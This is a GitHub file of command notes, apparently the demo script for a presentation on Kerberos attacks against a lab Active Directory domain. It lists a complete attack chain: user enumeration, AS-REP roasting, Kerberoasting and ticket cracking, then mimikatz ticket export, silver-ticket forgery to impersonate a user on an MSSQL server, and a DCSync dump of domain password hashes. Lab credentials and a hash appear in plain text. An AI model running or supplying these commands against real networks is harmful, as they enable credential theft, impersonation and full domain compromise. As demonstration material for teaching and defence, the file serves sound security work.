-
Notifications
You must be signed in to change notification settings - Fork 1
/
presentation cmds.txt
executable file
·105 lines (70 loc) · 2.19 KB
/
presentation cmds.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
Enumerate Users - No auth
set domain ONLYFOR.HAX
set dc dc.onlyfor.hax
set userlist userlist.txt
brute_no_pre_auth
Recover Interactively - No auth req'd
set domain ONLYFOR.HAX
set dc dc.onlyfor.hax
set username w
net_get_as_rep
Recover PCAP
set pcap samples/sample.krb.pcap
pcap_get_tickets
Crack Accounts
set pcap samples/sample.krb.pcap
pcap_get_tickets
set domain ONLYFOR.HAX
set dc dc.onlyfor.hax
set userlist userlist.txt
brute_no_pre_auth
set wordlist wordlist.txt
crack_as_rep_manual 0
crack_tgs_rep_manual 8
crack_as_rep
crack_tgs_rep
crack_tickets
Portscan the Domain
set username w
set password wP@$$w0rd1
set domain ONLYFOR.HAX
set dc dc.onlyfor.hax
scan_spn
Find accounts with "Do not use Kerberos Pre-Authentication" and get AS-REPs for them
set username w
set password wP@$$w0rd1
set domain ONLYFOR.HAX
set dc dc.onlyfor.hax
scan_ldap_no_pre_auth
Recover Interactively - Auth req'd
set username w
set password wP@$$w0rd1
set domain ONLYFOR.HAX
set dc dc.onlyfor.hax
set target_service MSSQLSvc/DomainW7.onlyfor.hax:1433
net_get_tgs_rep
set wordlist wordlist.txt
crack_tickets
Windows
SPN Scan
Config DNS -> Domain Controller (dc.onyfor.hax)
runas /netonly /user:[email protected] cmd.exe
setspn -T onlyfor.hax -Q */*
Get TGT
powershell
Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DomainW7.onlyfor.hax:1433"
Export Tickets
mimikatz "kerberos::list /export" exit
Impersonate user
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\SQLCMD.EXE" -S domainw7.onlyfor.hax
runas /netonly /user:[email protected] cmd.exe
c:\users\user\Desktop\Tricks\mimikatz.exe "kerberos::golden /sid:S-1-5-21-2556115776-1061989169-2417088117 /domain:ONLYFOR.HAX /ptt /id:1113 /target:DomainW7.onlyfor.hax:1433 /service:MSSQLSvc /rc4:99D0F1CF2C2A3A46D7BC5DB23C9BFE54 /user:[email protected]" exit
tsql
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\SQLCMD.EXE" -S domainw7.onlyfor.hax
select SYSTEM_USER;
go
Dump Domain Hashes
runas /netonly /user:[email protected] cmd.exe
c:\users\user\Desktop\Tricks\mimikatz.exe
lsadump::dcsync /domain:onlyfor.hax /user:administrator